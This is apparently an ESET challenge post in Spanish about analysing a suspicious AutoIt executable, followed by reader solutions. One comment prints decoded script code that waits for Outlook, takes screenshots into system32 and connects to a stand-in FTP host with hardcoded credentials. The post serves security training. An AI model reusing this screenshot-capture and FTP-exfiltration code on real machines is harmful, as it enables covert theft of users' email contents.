Desafío ESET #27: correos electrónicos filtrados

Queremos propronerles nuevamente un Desafío ESET, que tiene como objetivo analizar un ejecutable sospechoso que se encontró en los equipos de una empresa que no estaba protegida adecuadamente.

Todo el tema inició a raíz de información sensible de la empresa que estaba siendo publicada en Internet, relacionada con datos que se venían manejando a través del servicio de correo electrónico que utilizaba.

Luego de las primeras filtraciones, se empezaron a hacer monitoreos de algunos servicios de la empresa y de las computadoras de algunos empleados. Se pudo identificar un tráfico de red poco usual con archivos de los que no se pudo determinar su tipo, y se encontraron varios archivos en las máquinas analizadas que llamaron la atención de los analistas de seguridad en la empresa.

Particularmente, dentro de los archivos que fueron catalogados como sospechosos hay uno del que se pudo identificar una serie de acciones que llevaron a pensar que algo extraño podría estar ocurriendo. El archivo ejecutable se encuentra comprimido en formato zip con la contraseña desafio27.

El ganador del reto será quien pueda descubrir qué es lo que está pasando con la información de correos electrónicos y cómo es que esta información podría estar siendo filtrada. Además, como se han detectado intentos de conexiones a servicios FTP desconocidos, se debe encontrar toda la información sobre este servicio FTP que pueda ayudar a identificarlo.

Todas estas respuestas las pueden encontrar a partir del análisis del archivo ejecutable. Si bien no realiza ninguna acción maliciosa que pueda afectar la información del usuario, recomendamos que los análisis se hagan utilizando un entorno seguro, como puede ser una máquina virtual.

Les recordamos que aquellos que encuentren la solución deben enviar un comentario a este post detallando su respuesta. El viernes de la semana que viene, estaremos aprobando todos los comentarios y publicando la solución al desafío en WeLiveSecurity. El primero que logre resolver el reto y que no hubiera ganado alguno de los últimos tres desafíos se llevará una licencia de la última versión de la más completa solución de seguridad: ESET Smart Security.

La próxima semana estaremos dando algunas pistas sobre cómo pueden resolver este desafío, así que estén pendientes de nuestras redes sociales. Hasta entonces no daremos ningún tipo de información.

¡Éxitos resolviendo el desafío y que lo disfruten!

Autor , ESET

  • Henry Sanchez

    Se trata de un ejecutable generado a partir de un script AutoIT, el script se queda a la espera de que un proceso “OUTLOOK.EXE” se encuentre activo usando la api ProcessWait(), una vez se encuentre el proceso el malware se encarga de realizar una captura de pantalla guardando la imagen en la carpeta “C:WINDOWSsystem32” con un nombre generado aleatoriamente, luego de este se conecta al servidor FTP “ftp.malicioso.ir.ti”, con el usuario y contraseña “MalwUser” y “miclave123” respectivamente.

    Por lo tanto el malware se encarga de robas la información de los correos electronicos realizando capturas de pantalla cuando se detecta la aplicación OUTLOOK activa y ejecutandose, y posiblemente el malware luego lo suba al servidor FTP antes mencionado.

  • Anónimo

    _353t1a7in0am3ric4

  • Juan Esteban Valencia Pantoja

    Hola,

    Doy respuesta a a las preguntas del reto:

    1)Que está pasando con la información de correos electrónicos y cómo es que esta información podría estar siendo filtrada?

    La información está siendo filtrada gracias a las acciones de este malware, el cual esta construido bajo el lenguaje de scripting AutoIt, esta muestra actúa de la siguiente manera: El malware espera hasta que el proceso OUTLOOK.exe (cliente de correo) exista en la estación, cuando lo detecta toma 20 capturas de pantalla con un intervalo de 5823 milisegundos entre cada una, posteriormente son almacenadas localmente en la ruta C:Windowssystem32 las imágenes son generadas con nombres aleatorios.

    Por lo tanto se deduce que la información que está siendo filtrada son imágenes (capturas de pantalla de correos) las cuales están siendo enviadas a través de la red.

    2)Encontrar toda la información sobre este servicio FTP que pueda ayudar a identificarlo

    La muestra de malware establece conexiones con el ftp llamado http://ftp.malicioso.ir.ti se autentica con el usuario llamado “MalwUser” y el password “miclave 123”. A pesar de
    que se detectó que el malware establece una conexión con el FTP no se evidencian
    comandos de transferencia de archivos.

    Muchas gracias por construir el reto

    Saludos desde Colombia,

    Juan Esteban Valencia Pantoja
    jevalenciap@gmail.com

  • Emiliano

    Las filtraciones se estan produciendo de la siguiente manera:

    El script espera a que se este ejecutando “OUTLOOK.EXE” y luego empieza a realizar capturas cada 6 segundos, las guarda en la carpeta windows/system32 además intenta conectarse a un servidor FTP con los datos:
    host:ftp.malicioso.ir.ti
    user:MalwUser
    password:miclave123

    Parte del script decodificado donde se realizan estas acciones:

    Local $hc67vyt56e1 = “”
    ProcessWait(“OUTLOOK.EXE”)
    For $i = 1 To 20
    Local $hc67vyt56e1 = “”
    For $j = 1 To Random(5, 15, 1)
    $hc67vyt56e1 &= Chr(Random(65, 126, 1))
    Next
    _screencapture_capture(“C:WINDOWSsystem32” & $hc67vyt56e1)
    Sleep(5823)
    Next

    Local $fpleopiurs = “MyFTP malicioso”
    Local $ustipkmert = “ftp.malicioso.ir.ti”
    Local $pswitmkdsir = “MalwUser”
    Local $opemsdu = _ftp_open(“miclave123”)
    Local $trecbct = _ftp_connect($opemsdu, $fpleopiurs, $ustipkmert, $pswitmkdsir)
    Local $fpwmrlkuer = _ftp_close($trecbct)
    Local $uyrtwmop = _ftp_close($opemsdu)

Síguenos